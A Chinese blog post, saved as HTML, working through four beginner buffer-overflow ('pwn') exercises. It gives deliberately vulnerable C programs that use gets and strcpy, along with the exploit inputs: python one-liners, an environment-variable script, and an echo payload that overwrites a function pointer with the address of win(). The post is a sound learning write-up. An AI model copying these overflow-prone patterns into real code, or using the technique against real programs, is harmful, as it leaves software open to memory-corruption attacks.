<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    <title>2016武汉某宣传周题目----Hurry Up | Hyrathon的博客</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="pwn">
    <meta name="description" content="超级基础的8个pwn入门练习 如题, 作者一直不会pwn, 想要找一些入门的材料学习一下如何利用漏洞, 一个偶然的因素写了一些短小代码, 学习一下.  0x01据说这样写标题比较牛逼…. 123456789101112131415#include &amp;lt;stdio.h&amp;gt;int main(int argc, char** argv)&amp;#123;    int modified;    cha">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="2016武汉某宣传周题目----Hurry Up">
<meta property="og:url" content="http://yoursite.com/2017/09/27/abc/index.html">
<meta property="og:site_name" content="Hyrathon的博客">
<meta property="og:description" content="超级基础的8个pwn入门练习 如题, 作者一直不会pwn, 想要找一些入门的材料学习一下如何利用漏洞, 一个偶然的因素写了一些短小代码, 学习一下.  0x01据说这样写标题比较牛逼…. 123456789101112131415#include &amp;lt;stdio.h&amp;gt;int main(int argc, char** argv)&amp;#123;    int modified;    cha">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2017-09-29T02:30:18.879Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2016武汉某宣传周题目----Hurry Up">
<meta name="twitter:description" content="超级基础的8个pwn入门练习 如题, 作者一直不会pwn, 想要找一些入门的材料学习一下如何利用漏洞, 一个偶然的因素写了一些短小代码, 学习一下.  0x01据说这样写标题比较牛逼…. 123456789101112131415#include &amp;lt;stdio.h&amp;gt;int main(int argc, char** argv)&amp;#123;    int modified;    cha">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">Joachim Hyrathon</h5>
          <a href="mailto:hyrathon@gmail.com" title="hyrathon@gmail.com" class="mail">hyrathon@gmail.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/yscoder" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="http://www.weibo.com/ysweb" target="_blank" >
                <i class="icon icon-lg icon-weibo"></i>
                Weibo
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/custom"  >
                <i class="icon icon-lg icon-link"></i>
                测试
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">2016武汉某宣传周题目----Hurry Up</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">2016武汉某宣传周题目----Hurry Up</h1>
        <h5 class="subtitle">
            
                <time datetime="2017-09-26T16:00:00.000Z" itemprop="datePublished" class="page-time">
  2017-09-27
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#超级基础的8个pwn入门练习"><span class="post-toc-number">1.</span> <span class="post-toc-text">超级基础的8个pwn入门练习</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x01"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">0x01</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x02"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">0x02</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x03"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">0x03</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#0x04"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">0x04</span></a></li></ol></li></ol>
        </nav>
    </aside>
    
<article id="post-abc"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">2016武汉某宣传周题目----Hurry Up</h1>
        <div class="post-meta">
            <time class="post-time" title="2017-09-27 00:00:00" datetime="2017-09-26T16:00:00.000Z"  itemprop="datePublished">2017-09-27</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="超级基础的8个pwn入门练习"><a href="#超级基础的8个pwn入门练习" class="headerlink" title="超级基础的8个pwn入门练习"></a>超级基础的8个pwn入门练习</h1><blockquote>
<p>如题, 作者一直不会pwn, 想要找一些入门的材料学习一下如何利用漏洞, 一个偶然的因素写了一些短小代码, 学习一下.</p>
</blockquote>
<h2 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h2><p><strong>据说这样写标题比较牛逼….</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char** argv)</div><div class="line">&#123;</div><div class="line">    int modified;</div><div class="line">    char buffer[64];</div><div class="line"></div><div class="line">    modified = 0;</div><div class="line">    gets(buffer);</div><div class="line">    if(modified != 0)</div><div class="line">        printf(&quot;Pwnd!&quot;);</div><div class="line">    else</div><div class="line">        printf(&quot;Please try again!&quot;);</div><div class="line">    return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>gets函数由于对输入长度没有校验导致的栈覆盖.<br>注意buffer是64字节长, 当输入超过64之后会覆盖后面地址, 由于栈是向低地址生长的, buffer在modified之前, 会导致覆盖.<br>利用python生成输入,用管道将python输出定位给该程序输入.</p>
<p><code>python -c &quot;print &#39;A&#39;*64+&#39;B&#39;&quot; | ./a.out</code></p>
<h2 id="0x02"><a href="#0x02" class="headerlink" title="0x02"></a>0x02</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char** argv)</div><div class="line">&#123;</div><div class="line">    int modified;</div><div class="line">    char buffer[64];</div><div class="line">    </div><div class="line">    if(argc == 1)&#123;</div><div class="line">        printf(&quot;Please check args.&quot;);</div><div class="line">        exit(1);</div><div class="line">    &#125;</div><div class="line">    modified = 0;</div><div class="line">    strcpy(buffer, argv[1]);</div><div class="line"></div><div class="line">    if(modified == 0x61626364)</div><div class="line">        printf(&quot;Pwned!\n&quot;);</div><div class="line">    else</div><div class="line">        printf(&quot;Nice try.\n&quot;);</div><div class="line">    return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>通过参数进行攻击, strcpy拷贝字符串时没有对字符串长度进行校验, 会导致覆盖后边的数据.<br><code>./a.out $(python -c &quot;print &#39;A&#39;*64+&#39;dcba&#39;&quot;)</code><br>使用$()进行命令替换, 将python打印到标准输出的内容作为输入传递, 由于小端问题需要的abcd需要以逆序输入.</p>
<h2 id="0x03"><a href="#0x03" class="headerlink" title="0x03"></a>0x03</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char** argv)</div><div class="line">&#123;</div><div class="line">    int modified;</div><div class="line">    char buffer[64];</div><div class="line">    char* variable;</div><div class="line"></div><div class="line">    variable = getenv(&quot;HUANJING&quot;);</div><div class="line">    </div><div class="line">    if (variable == NULL)&#123;</div><div class="line">        printf(&quot;Please set the HUANJING environment variable\n&quot;);</div><div class="line">        exit(1);</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    modified = 0;</div><div class="line">    strcpy(buffer, variable);</div><div class="line"></div><div class="line">    if(modified == 0x0d0a0d0a)</div><div class="line">        printf(&quot;Pwned!\n&quot;);</div><div class="line">    else</div><div class="line">        printf(&quot;Nice try!\n&quot;);</div><div class="line">    return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>环境变量的攻击, 使用python脚本会方便一些(因为需要环境变量包括不可见字符), 使用shell的话, 需要将不可见字符用$(\x0d)这样的形式表示出来.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">import os</div><div class="line"></div><div class="line">def crack():</div><div class="line">    os.putenv(&quot;HUANJING&quot;, &quot;A&quot;*64+&quot;\x0a\x0d\x0a\x0d&quot;)</div><div class="line">    os.system(&quot;./pwn3&quot;)</div><div class="line"></div><div class="line">crack()</div></pre></td></tr></table></figure></p>
<h2 id="0x04"><a href="#0x04" class="headerlink" title="0x04"></a>0x04</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line"></div><div class="line">typedef void (*func)();</div><div class="line"></div><div class="line">void win()&#123;</div><div class="line">    printf(&quot;Pwned!\n&quot;);</div><div class="line">&#125;</div><div class="line"></div><div class="line">int main(int argc, char** argv)</div><div class="line">&#123;</div><div class="line">    func fp;</div><div class="line">    char buffer[64];</div><div class="line"></div><div class="line">    fp = NULL;</div><div class="line">    gets(buffer);</div><div class="line"></div><div class="line">    if(fp)&#123;</div><div class="line">        printf(&quot;called function pointer, jumping to 0x%08x\n&quot;, fp);</div><div class="line">        fp();</div><div class="line">    &#125;</div><div class="line">    return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>缓冲区溢出后会覆盖调用函数的指针, 导致可以执行任意函数的漏洞, 首先确定一下需要调用函数的地址.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$gdb a.out</div><div class="line">(gdb)b win</div><div class="line">Breakingpoint 1 at 0x804841a</div></pre></td></tr></table></figure></p>
<p>可以发现断点下在了0804841a地址, 因此64位填充之后应该紧跟这个地址, 注意倒序.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">echo -e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&quot;\x1a\x84\x04\x08&quot; &gt; shellcode.txt</div><div class="line">./a.out &lt; shellcode.txt</div></pre></td></tr></table></figure></p>
<p>下面没了…</p>

        </div>

        <blockquote class="post-copyright">
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2017-09-29T02:30:18.879Z" itemprop="dateUpdated">2017-09-29 10:30:18</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2017/09/27/abc/" target="_blank" rel="external">http://yoursite.com/2017/09/27/abc/</a>
        
    </div>
    <footer>
        <a href="http://yoursite.com">
            <img src="/img/avatar.jpg" alt="Joachim Hyrathon">
            Joachim Hyrathon
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://yoursite.com/2017/09/27/abc/&title=《2016武汉某宣传周题目----Hurry Up》 — Hyrathon的博客&pic=http://yoursite.com/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://yoursite.com/2017/09/27/abc/&title=《2016武汉某宣传周题目----Hurry Up》 — Hyrathon的博客&source=三流逆向工程师的N流PWNer之旅" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://yoursite.com/2017/09/27/abc/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《2016武汉某宣传周题目----Hurry Up》 — Hyrathon的博客&url=http://yoursite.com/2017/09/27/abc/&via=http://yoursite.com" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://yoursite.com/2017/09/27/abc/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2017/09/27/GeekpwnSecretCode/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">Geekpwn SecretCode</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2017/08/12/sqzip/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">No title</h4>
      </a>
    </div>
  
</nav>



    


<section class="comments" id="comments">
    <div id="disqus_thread"></div>
    <script>
    var disqus_shortname = 'https-hyrathon-github-io.disqus.com';
    lazyScripts.push('//' + disqus_shortname + '.disqus.com/embed.js')
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>













</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        谢谢大爷~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/" alt="打赏二维码">
        </div>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>博客内容遵循 <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span>Joachim Hyrathon &copy; 2015 - 2017</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://yoursite.com/2017/09/27/abc/&title=《2016武汉某宣传周题目----Hurry Up》 — Hyrathon的博客&pic=http://yoursite.com/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://yoursite.com/2017/09/27/abc/&title=《2016武汉某宣传周题目----Hurry Up》 — Hyrathon的博客&source=三流逆向工程师的N流PWNer之旅" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://yoursite.com/2017/09/27/abc/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《2016武汉某宣传周题目----Hurry Up》 — Hyrathon的博客&url=http://yoursite.com/2017/09/27/abc/&via=http://yoursite.com" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://yoursite.com/2017/09/27/abc/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://yoursite.com/2017/09/27/abc/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
